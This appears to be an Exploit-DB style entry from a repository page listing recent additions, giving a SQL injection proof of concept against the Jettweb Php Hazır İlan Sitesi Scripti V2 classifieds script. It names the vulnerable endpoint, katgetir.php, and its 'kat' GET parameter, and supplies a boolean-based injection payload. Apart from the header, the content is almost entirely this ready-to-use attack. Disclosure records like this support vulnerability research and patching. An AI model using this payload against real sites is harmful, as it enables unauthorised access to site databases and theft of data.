
9 changes to exploits/shellcodes Microsoft Windows 7/2008 - 'Win32k' Denial of Service (PoC) Firefox < 66.0.1 - 'Array.prototype.slice' Buffer Overflow Spidermonkey - IonMonkey Type Inference is Incorrect for Constructors Entered via OSR Jettweb Php Hazır İlan Sitesi Scripti V2 - SQL Injection Rukovoditel ERP & CRM 2.4.1 - 'path' Cross-Site Scripting XooGallery - Multiple SQL Injection XooDigital - 'p' SQL Injection Titan FTP Server Version 2019 Build 3505 - Directory Traversal / Local File Inclusion SJS Simple Job Script - SQL Injection / Cross-Site Scripting
14 lines
No EOL
453 B
Text
14 lines
No EOL
453 B
Text
# Exploit Title: Jettweb Php Hazır İlan Sitesi Scripti V2 - SQL Injection
|
||
# Date: 25.03.2019
|
||
# Exploit Author: Ahmet Ümit BAYRAM
|
||
# Vendor Homepage: https://jettweb.net/c-23-ilan-Siteleri.html
|
||
# Demo Site: http://ilanv2.proemlaksitesi.net
|
||
# Version: V2
|
||
# Tested on: Kali Linux
|
||
# CVE: N/A
|
||
|
||
----- PoC : SQLi -----
|
||
|
||
Request: http://localhost/[PATH]/m/katgetir.php?kat=1
|
||
Vulnerable Parameter: kat (GET)
|
||
Payload: kat=1' OR NOT 1300=1300-- rwTf |